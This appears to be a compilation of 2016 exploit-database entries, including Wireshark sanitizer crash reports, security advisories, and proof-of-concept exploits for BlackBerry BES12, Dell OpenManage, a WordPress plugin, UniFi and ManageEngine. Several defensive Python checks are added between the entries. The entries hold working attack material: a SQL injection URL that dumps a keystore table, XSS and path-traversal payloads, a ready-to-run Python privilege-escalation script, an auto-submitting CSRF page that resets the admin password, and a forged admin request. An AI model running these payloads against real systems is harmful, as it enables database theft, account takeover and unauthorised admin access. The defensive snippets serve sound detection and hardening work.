#45 0x515daf in main wireshark/tshark.c:2197:13
0x7f72db15e078 is located 0 bytes to the right of global variable 'nm_att_tlvdef_base' defined in 'packet-gsm_abis_oml.c:1356:30' (0x7f72db15d880) of size 2040
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17 in dissect_oml_attrs
Shadow bytes around the buggy address:
0x0feedb623bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0feedb623c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9]
0x0feedb623c10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0feedb623c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5092==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11825. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39482.zip
BlackBerry Enterprise Service 12 (BES12) Self-Service
Affected versions: BES12 < 12.4
CVE: CVE-2016-1914 and CVE-2016-1915
PDF:
http://security-assessment.com/files/documents/advisory/Blackberry%20BES12%20Self-Service%20Multiple%20Vulnerabilities.pdf
+-----------+
|Description|
+-----------+
Blackberry BES12 is an enterprise mobile management solution and
contains a self-service web application available to mobile users. This
web application contains multiple vulnerabilities including
unauthenticated SQL injection and reflected cross site scripting.
Limited access to an on-premise BES12 environment was provided during
the discovery of these vulnerabilities. The full impact of the
vulnerabilities in relation to compromising other portions of the BES12
solution, such as mobile devices, is unclear.
+------------+
|Exploitation|
+------------+
*SQL Injection*
The Java servlet com.rim.mdm.ui.server.ImageServlet is vulnerable to SQL
injection via the imageName parameter. This servlet is exposed at
multiple paths and is used to fetch an image from the database:
/mydevice/client/image
/admin/client/image
/myapps/client/image
/ssam/client/image
/all/client/image
This was discovered on a production BES12 on-premise deployment and the
injection vector allowed both UNION and stacked queries to be executed
on the Microsoft SQL server used by BES12. This allows full read/write
access to the database, and can potentially result in command execution
via xp_cmdshell depending on the database user configuration.
The following proof of concept demonstrates an injection payload which
will select the entire obj_keystore_entry table. The query will
serialise the entire table into an XML document which is returned in the
HTTP response as UTF-16 without the leading BOM (byte order mark)
causing most text editors to fail to display the response correctly.
https://<server>/mydevice/client/image?imageName=ui.cobranded.login.logo'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,(SELECT+*+FROM+obj_keystore_entry+FOR+XML+PATH(''))+--
The technique above can be used to download any database table available
to the BES12 database user.
Notable database tables are:
* obj_user which contains BES12 user details.
* obj_user_authentication which contains authentication tokens.
* obj_user_device which based on column names, contains enrolment
tokens, enrolment secrets and device encryption keys.
It is unclear if this information is sufficient to decrypt a lost/stolen
BES12 mobile device.
*Reflected Cross Site Scripting*
Two areas of the self-service web application exist where user-supplied
input is reflected directly in web pages, allowing a malicious user to
conduct Cross Site Scripting (XSS) attacks against users of the
application. While the application uses the HttpOnly cookie flag for
session tokens, successful exploitation allows malicious JavaScript to
perform any action within the application that the targeted user is able
to. The administrative web application is typically hosted on the same
domain and may be attacked using these XSS vectors, although this is
BES12 deployment specific.
The table below details where Cross Site Scripting was detected and
which parameters are vulnerable:
https://<server>/mydevice/index.jsp?locale="><script>alert(1)</script>
https://<server>/mydevice/loggedOut.jsp?locale="><script>alert(1)</script>
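A log-review check for the two issues above, as an added example that is not part of the advisory: it flags `imageName` values on the five servlet paths and `locale` values on the two JSP pages that fall outside an allowlist. The allowlist patterns, the function names and the access-log lines are assumptions constructed for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Paths and parameter names are taken from the advisory.
IMAGE_PATHS = {
    "/mydevice/client/image", "/admin/client/image", "/myapps/client/image",
    "/ssam/client/image", "/all/client/image",
}
LOCALE_PATHS = {"/mydevice/index.jsp", "/mydevice/loggedOut.jsp"}

# Assumed shapes of legitimate values (not documented on this page):
# image names are dotted identifiers, locales look like "en" or "en_US".
IMAGE_NAME_OK = re.compile(r"[A-Za-z0-9_.-]{1,128}")
LOCALE_OK = re.compile(r"[A-Za-z]{2,3}(?:[_-][A-Za-z0-9]{2,8}){0,2}")

# Common log format: client identity user [time] "METHOD target PROTOCOL" ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*"')


def audit_target(target):
    """Return (path, parameter, decoded value) for each out-of-policy parameter."""
    parts = urlsplit(target)
    findings = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if parts.path in IMAGE_PATHS and key == "imageName":
            ok = IMAGE_NAME_OK.fullmatch(value)
        elif parts.path in LOCALE_PATHS and key == "locale":
            ok = LOCALE_OK.fullmatch(value)
        else:
            continue
        if not ok:
            findings.append((parts.path, key, value))
    return findings


def scan(lines):
    """Return (client, path, parameter, value) for every flagged request in the log."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, _method, target = m.groups()
        hits.extend((client,) + finding for finding in audit_target(target))
    return hits


# Constructed sample log. Client addresses come from documentation ranges; the
# request targets reuse the URLs quoted in the advisory (XSS value percent-encoded).
SAMPLE_LOG = """
198.51.100.10 - - [15/Feb/2016:09:00:01 +0000] "GET /mydevice/client/image?imageName=ui.cobranded.login.logo HTTP/1.1" 200 5120
203.0.113.7 - - [15/Feb/2016:09:00:05 +0000] "GET /mydevice/client/image?imageName=ui.cobranded.login.logo'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,(SELECT+*+FROM+obj_keystore_entry+FOR+XML+PATH(''))+-- HTTP/1.1" 200 88
203.0.113.7 - - [15/Feb/2016:09:00:09 +0000] "GET /mydevice/index.jsp?locale=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 900
198.51.100.10 - - [15/Feb/2016:09:00:12 +0000] "GET /mydevice/loggedOut.jsp?locale=en_US HTTP/1.1" 200 700
""".strip().splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same two patterns can serve as server-side input validation in front of the servlet and the JSP pages on deployments that cannot move to BES12.4 immediately.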
+----------+
| Solution |
+----------+
Upgrade to BES12.4.
+-------------------+
|Disclosure Timeline|
+-------------------+
Initial disclosure to Blackberry – 19 Nov 2015
Disclosure receipt confirmed by Blackberry – 19 Nov 2015
Request for update from Blackberry – 7 Dec 2015
Vulnerabilities confirmed by Blackberry – 8 Dec 2015
Blackberry confirms fixes will be released as part of BES12.4 – 28 Jan 2016
BES12.4 released – 29 Jan 2016
Advisory released – 15 Feb 2016
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is a leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients
include some of the largest globally recognised companies in areas such
as finance, telecommunications, broadcasting, legal and government. Our
aim is to provide the very best independent advice and a high level of
technical expertise while creating long and lasting professional
relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info@security-assessment.com
Source: https://code.google.com/p/google-security-research/issues/detail?id=654
The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==32475==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fd688698b10 at pc 0x7fd685351320 bp 0x7ffd862371a0 sp 0x7ffd86237198
READ of size 4 at 0x7fd688698b10 thread T0
#0 0x7fd68535131f in add_ff_vht_compressed_beamforming_report wireshark/epan/dissectors/packet-ieee80211.c:9143:8
#1 0x7fd68534746f in add_ff_action_vht wireshark/epan/dissectors/packet-ieee80211.c:9199:16
#2 0x7fd68533f813 in add_ff_action wireshark/epan/dissectors/packet-ieee80211.c:9426:12
#3 0x7fd685324811 in add_fixed_field wireshark/epan/dissectors/packet-ieee80211.c:9566:14
#4 0x7fd68536ebae in dissect_ieee80211_mgt wireshark/epan/dissectors/packet-ieee80211.c:16388:17
#5 0x7fd685368cce in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:18218:7
#6 0x7fd685338dae in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18375:10
#7 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
#9 0x7fd6842b9dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#10 0x7fd684fc95f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#11 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#12 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
#13 0x7fd6842c42be in call_dissector_only wireshark/epan/packet.c:2662:8
#14 0x7fd6842b5ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#15 0x7fd6842b533b in dissect_record wireshark/epan/packet.c:501:3
#16 0x7fd6842633c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#17 0x5264eb in process_packet wireshark/tshark.c:3728:5
#18 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#19 0x515daf in main wireshark/tshark.c:2197:13
0x7fd688698b10 is located 48 bytes to the left of global variable '<string literal>' defined in 'packet-ieee80211.c:9115:70' (0x7fd688698b40) of size 30
'<string literal>' is ascii string 'Average Signal to Noise Ratio'
0x7fd688698b10 is located 0 bytes to the right of global variable 'ns_arr' defined in 'packet-ieee80211.c:9091:20' (0x7fd688698ae0) of size 48
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ieee80211.c:9143:8 in add_ff_vht_compressed_beamforming_report
Shadow bytes around the buggy address:
0x0ffb510cb110: f9 f9 f9 f9 00 00 00 00 00 00 04 f9 f9 f9 f9 f9
0x0ffb510cb120: 00 00 00 07 f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9
0x0ffb510cb130: 00 00 06 f9 f9 f9 f9 f9 00 00 00 00 00 03 f9 f9
0x0ffb510cb140: f9 f9 f9 f9 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
0x0ffb510cb150: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
=>0x0ffb510cb160: 00 00[f9]f9 f9 f9 f9 f9 00 00 00 06 f9 f9 f9 f9
0x0ffb510cb170: 00 00 00 05 f9 f9 f9 f9 00 00 00 00 00 00 00 01
0x0ffb510cb180: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 03 f9
0x0ffb510cb190: f9 f9 f9 f9 00 00 00 07 f9 f9 f9 f9 00 00 00 00
0x0ffb510cb1a0: 00 00 00 00 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
0x0ffb510cb1b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==32475==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11818. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39483.zip
# Exploit Title: Dell OpenManage Server Administrator 8.2 Authenticated Directory Traversal
# Date: February 22, 2016
# Exploit Author: hantwister
# Vendor Homepage: http://www.dell.com/
# Software Link: http://www.dell.com/support/contents/us/en/19/article/Product-Support/Self-support-Knowledgebase/enterprise-resource-center/Enterprise-Tools/OMSA
# Version: 8.2
# Tested on: Windows 7 x64
When authenticated as an admin, make the following adjustments to the URL
below:
1) Substitute "<IP>" for the target;
2) Substitute "Windows\WindowsUpdate.log" for the desired file;
3) Substitute the value of the vid parameter and the folder name preceding
"/ViewFile" with the vid parameter from your current session.
https://<IP>:1311/0123456789ABCDEF/ViewFile?path=\temp&file=hello\..\..\..\..\..\..\..\..\Windows\WindowsUpdate.log&vid=0123456789ABCDEF
In the file parameter, "hello" can be changed to any other name; the folder
need not exist. However, the file parameter must not start with a common
file path separator, nor a dot character.
The path parameter should not be changed; the provided value is essential
to bypassing a security control.
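A containment check for the request values quoted in the InstantCoder `listFiles`/upload advisory and in the OMSA note above, as an added example that is not code from either product. `naive_prefix_check` is a hypothetical stand-in for a filter that inspects only the first character, and the base directories and function names are assumptions.

```python
import ntpath
import posixpath
from urllib.parse import unquote


class PathRejected(ValueError):
    """Raised when a request value would resolve outside its base directory."""


def naive_prefix_check(file_param):
    # Hypothetical first-character filter: rejects a leading separator or dot,
    # accepts everything else. This is the kind of check the OMSA note implies.
    return not file_param.startswith(("/", "\\", "."))


def resolve_under(base, raw_value, windows=False):
    """Decode raw_value once, resolve it lexically under base, return it or raise."""
    mod = ntpath if windows else posixpath
    value = unquote(raw_value)
    if "\x00" in value:
        raise PathRejected("NUL byte in path")
    # The wifi interface sends "/" for its top folder, so leading separators
    # are treated as "relative to base" instead of "filesystem root".
    value = value.lstrip("/\\" if windows else "/")
    base_norm = mod.normpath(base)
    candidate = mod.normpath(mod.join(base_norm, value))
    b, c = mod.normcase(base_norm), mod.normcase(candidate)
    if c != b and not c.startswith(b + mod.sep):
        raise PathRejected("resolves outside base: " + candidate)
    return candidate


def safe_upload_name(raw_filename):
    """Reduce an upload's filename to a single path component, or raise."""
    value = unquote(raw_filename)
    if "\x00" in value:
        raise PathRejected("NUL byte in filename")
    name = ntpath.basename(value)  # ntpath splits on both "/" and "\"
    if name in ("", ".", ".."):
        raise PathRejected("no usable file name")
    return name


def is_allowed(base, raw_value, windows=False):
    try:
        resolve_under(base, raw_value, windows)
        return True
    except PathRejected:
        return False


# Request values quoted from the advisories; base directories are assumptions.
DOC_ROOT = "/var/mobile/Documents"  # constructed app document root
OMSA_BASE = "\\temp"                # the path= value from the OMSA URL
OMSA_FILE = "hello\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\WindowsUpdate.log"
LISTFILES_1 = "./.././../../../../../../../../../../"
LISTFILES_2 = "/.././../../../../../../../../../../etc/%00"

if __name__ == "__main__":
    print("first-character filter accepts OMSA value:", naive_prefix_check(OMSA_FILE))
    print("containment check accepts OMSA value:", is_allowed(OMSA_BASE, OMSA_FILE, True))
    for value in (LISTFILES_1, LISTFILES_2, "/", "/projects/demo.c"):
        print(repr(value), "->", is_allowed(DOC_ROOT, value))
```

The check is lexical; on a real filesystem, resolve symlinks (for example with `os.path.realpath`) before the containment test.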
Source: https://code.google.com/p/google-security-research/issues/detail?id=647
The following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==5869==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001e95c at pc 0x0000004c1386 bp 0x7fff8c82cbf0 sp 0x7fff8c82c3a0
WRITE of size 1425 at 0x61b00001e95c thread T0
#0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0x9c8ab0 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1614:5
#2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
#3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
#4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#6 0x52c1df in main wireshark/tshark.c:2197:13
0x61b00001e95c is located 0 bytes to the right of 1500-byte region [0x61b00001e380,0x61b00001e95c)
allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f1f907a8610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x83fff6 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2
#3 0x53214d in cf_open wireshark/tshark.c:4195:9
#4 0x52bc7e in main wireshark/tshark.c:2188:9
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c367fffbcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffbd20: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0c367fffbd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbd50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5869==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11795. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39490.zip
"""
* Exploit Title: Extra User Details [Privilege Escalation]
* Discovery Date: 2016-02-13
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://vadimk.com/
* Software Link: https://wordpress.org/plugins/extra-user-details/
* Version: 0.4.2
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress
Description
-----------
_Extra User Details_ plugin for WordPress suffers from a Privilege Escalation
vulnerability.
The plugin hooks the `eud_update_ExtraFields` function to `profile_update`
WordPress action. This function doesn't properly check user capabilities and
updates all meta information passed to post data. The only condition is that
the post variable name has the `eud` prefix which is stripped before updating
the values in DB.
An attacker can exploit this misbehavior to update the {prefix}\_capabilities
meta information to gain administrative privileges.
PoC
---
In the following PoC we assume that the database has the `wp` prefix, a very
common scenario as this is the default WordPress value
"""
#!/usr/bin/python3
################################################################################
# Extra User Details Privilege Escalation Exploit
#
# Author: Panagiotis Vagenas <pan.vagenas>
#
# Dependencies: BeautifulSoup (http://www.crummy.com/software/BeautifulSoup/)
################################################################################
import requests
from bs4 import BeautifulSoup
baseUrl = 'http://example.com'
loginUrl = baseUrl + '/wp-login.php'
profileUrl = baseUrl + '/wp-admin/profile.php'
loginPostData = {
    'log': 'username',
    'pwd': 'password',
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}
# Log in as a regular user and keep the session cookies
s = requests.Session()
r = s.post(loginUrl, loginPostData)
if r.status_code != 200:
    print('Login error')
    exit(1)
# Fetch the profile form so its existing fields can be resubmitted
r = s.get(profileUrl)
soup = BeautifulSoup(r.text, 'html.parser')
f = soup.find('form', {'id': 'your-profile'})
if not f:
    print('Error')
    exit(1)
# Extra field carrying the `eud` prefix followed by the capabilities meta key
data = {
    'eudwp_capabilities[administrator]': 1,
}
for i in f.find_all('input'):
    if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']:
        data[i.attrs['name']] = i.attrs['value']
r = s.post(profileUrl, data)
if r.status_code == 200:
    print('Success')
exit(0)
"""
Solution
--------
Upgrade to v0.4.2.1
Timeline
--------
1. **2016-02-13**: Vendor notified through wordpress.org support forums
2. **2016-02-13**: Vendor notified through the contact form on his website
3. **2016-02-13**: Vendor responded and received details about this issue
4. **2016-02-15**: Vendor released v0.4.2.1 which resolves this issue
"""
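The flaw described in this advisory (every `eud`-prefixed POST variable is written to user meta), modelled in Python as an added example; it is not the plugin's PHP code and not the vendor's v0.4.2.1 fix. The registered field names, the function names and the `actor_may_edit` flag (a stand-in for a WordPress capability check) are assumptions.

```python
PREFIX = "eud"
# Constructed: the extra profile fields an administrator defined in the plugin.
REGISTERED_FIELDS = {"phone", "company"}


def update_vulnerable(user_meta, post):
    """Model of the flawed hook: strip the prefix, write whatever is left."""
    for name, value in post.items():
        if name.startswith(PREFIX):
            user_meta[name[len(PREFIX):]] = value
    return user_meta


def update_hardened(user_meta, post, actor_may_edit):
    """Write only registered scalar fields; return the meta keys that were refused."""
    if not actor_may_edit:  # stand-in for a capability check on the target user
        raise PermissionError("actor may not edit this profile")
    refused = []
    for name, value in post.items():
        if not name.startswith(PREFIX):
            continue
        key = name[len(PREFIX):]
        # Allow-list the key and require a plain string, so an array value such
        # as capabilities[administrator] can never reach the meta table.
        if key not in REGISTERED_FIELDS or not isinstance(value, str):
            refused.append(key)
            continue
        user_meta[key] = value
    return refused


# Constructed request body, parsed the way PHP parses name[key]=value fields.
SAMPLE_POST = {
    "first_name": "Alice",
    "eudphone": "555-0100",
    "eudwp_capabilities": {"administrator": "1"},
}


def demo():
    """Run both handlers on the same constructed input."""
    before = {"wp_capabilities": {"subscriber": True}}
    flawed = update_vulnerable(dict(before), SAMPLE_POST)
    safe = dict(before)
    refused = update_hardened(safe, SAMPLE_POST, actor_may_edit=True)
    return flawed, safe, refused


if __name__ == "__main__":
    print(demo())
```

Logging the refused keys gives a detection signal: a profile update that tries to write a key outside the registered set is not something the plugin's own form produces.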
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
-----------------------
Product: Ubiquiti Networks UniFi
Vendor URL: www.ubnt.com
Type: Cross-Site Request Forgery [CWE-353]
Date found: 2015-03-19
Date published: 2016-02-23
CVSSv3 Score: 6.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L)
CVE: -
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
--------------------
UniFi v3.2.10
older versions may be affected too.
4. INTRODUCTION
---------------
The UniFi® Controller software is a powerful, enterprise wireless software
engine ideal for high-density client deployments requiring low latency and
high uptime performance. A single UniFi Controller running in the cloud
can manage multiple sites: multiple, distributed deployments and
multi-tenancy for managed service providers.
(from the vendor's homepage)
5. VULNERABILITY DESCRIPTION
----------------------------
A generic Cross-Site Request Forgery protection bypass vulnerability was
identified in UniFi v3.2.10 and prior.
The application uses a CSRF protection, which is based on verifying the
Referer header, but does not catch the case where the Referer header
is completely missing.
This leads to a generic CSRF protection bypass, resulting in all
application specific functionalities becoming vulnerable. An attacker needs
to trick the victim to visit an arbitrary website in order to exploit the
vulnerability. Successful exploits can allow the attacker to compromise the
whole application including connected devices, e.g. by changing passwords
of users, adding new users, changing device usernames and passwords or by
creating new WLAN configurations.
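The Referer logic described above, as an added example (not UniFi's code and not the vendor's fix): a check that validates the header only when it is present, next to one that fails closed. The trusted origin, the function names and the sample headers are constructed assumptions.

```python
from urllib.parse import urlsplit

# Constructed value: the origin the management UI is served from.
TRUSTED_ORIGIN = ("https", "unifi.example.test", 8443)
DEFAULT_PORTS = {"http": 80, "https": 443}
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def header(headers, name):
    """Case-insensitive header lookup; None when the header is absent."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def origin_of(url):
    """Return (scheme, host, port), or None unless url is an absolute http(s) URL."""
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError:
        return None
    scheme = parts.scheme.lower()
    if scheme not in DEFAULT_PORTS or not parts.hostname:
        return None
    return (scheme, parts.hostname, port or DEFAULT_PORTS[scheme])


def lenient_check(headers):
    """Flawed pattern: the Referer is validated only if the browser sent one."""
    referer = header(headers, "Referer")
    if referer is None:
        return True  # a missing header is treated as nothing to check
    return origin_of(referer) == TRUSTED_ORIGIN


def strict_check(method, headers):
    """Fail closed: a state-changing request must prove where it came from."""
    if method.upper() not in STATE_CHANGING:
        return True
    # Prefer Origin, fall back to Referer. Compare parsed origins, never string
    # prefixes, so look-alike hosts and the literal "null" origin do not match.
    for name in ("Origin", "Referer"):
        value = header(headers, name)
        if value is not None:
            return origin_of(value) == TRUSTED_ORIGIN
    return False  # neither header present: reject


# Constructed request headers.
SAME_SITE = {"Referer": "https://unifi.example.test:8443/manage/site/default"}
CROSS_SITE = {"Referer": "https://other.example/page"}
LOOKALIKE = {"Referer": "https://unifi.example.test.other.example:8443/"}
NO_REFERER = {}

if __name__ == "__main__":
    for label, h in (("same-site", SAME_SITE), ("cross-site", CROSS_SITE),
                     ("look-alike", LOOKALIKE), ("no referer", NO_REFERER)):
        print(label, lenient_check(h), strict_check("POST", h))
```

Header checks like this are a secondary control; a per-session anti-CSRF token verified on every state-changing request remains the primary one.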
6. PROOF-OF-CONCEPT
-------------------
The following PoC changes the password of the user "admin" to "csrfpwd":
<html>
<head>
<script>
function load() {
var postdata = '<form id=csrf method=POST enctype=\'text\/plain\' action=\'https://127.0.0.1:8443/api/s/default/cmd/sitemgr\'>' +
'<input type=hidden name=\'json=%7B%22name%22%3A%22admin%22%2C%22x_password%22%3A%22csrfpwd%22%2C%22email%22%3A%22info%40mail.com%22%2C%22lang%22%3A%22en_US%22%2C%22cmd%22%3A%22set-self%22%7D\' value=\'\' />' +
'</form>';
top.frames[0].document.body.innerHTML=postdata;
top.frames[0].document.getElementById('csrf').submit();
}
</script>
</head>
<body onload="load()">
<iframe src="about:blank" id="noreferer"></iframe>
</body>
</html>
7. SOLUTION
-----------
Upgrade to UniFi v4.7.5 or later
8. REPORT TIMELINE
------------------
2015-03-19: Discovery of the vulnerability
2015-03-10: Reported via Ubiquiti's Bug Bounty program (hackerone.com)
2015-06-02: Vendor apologizes for his backlog
2015-09-28: Asking for status update via HackerOne
2015-09-28: Vendor asks to test against version 4.7.5
2015-10-02: Verified working fix for v4.7.5
2015-10-23: Vendor changes status to "Resolved"
2015-11-24: Asking for coordinated disclosure via email
2015-12-08: No response from vendor
2015-12-08: Requested public disclosure on HackerOne
2016-01-08: Report is published automatically
2016-02-23: Advisory released
9. REFERENCES
-------------
https://www.rcesecurity.com/2016/02/ubiquiti-bug-bounty-unifi-v3-2-10-generic-csrf-protection-bypass
https://hackerone.com/reports/52635
================================================================
ManageEngine Firewall Analyzer 8.5– Privilege Escalation Vulnerability
================================================================
Description :
Vulnerability Type : Privilege Escalation Vulnerability
Vulnerable Version : 8.5
Vendor Homepage: https://www.manageengine.com/products/firewall/download.html
CVE-ID :
Severity : High
Author – Sachin Wagh (@tiger_tigerboy)
ManageEngine Firewall Analyzer is an agentless log analytics and
configuration management software that helps network administrators to
centrally collect, archive, analyze their security device logs and generate
forensic reports out of it.
It allows an attacker to gain admin privileges.
Proof of Concept URL
--------------------
1. Set up Burp, change the user password, and change the username to admin.
2. Burp Request :
POST /fw/userManagementForm.do HTTP/1.1
Host: localhost:8500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8500/fw/index2.do?url=archivedFiles&helpP=archivedFiles&completeData=true&tab=system&subTab=cal&flushCache=true&DateRange=false&timeFrame=LastWeek
Cookie: leftPanel=230px; JSESSIONID=E58D08B4F3AF70279BBB128D713EADB7; JSESSIONIDSSO=A326C72CC526B521A8EA9286C7951F0C; FWA_TABLE=TS
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
password=guest&email=guest%40adventnet.com&addField=false&userName=guest&userID=2&changePassword=true&isDemo=false&domainName=&productName=firewall&next=logoff
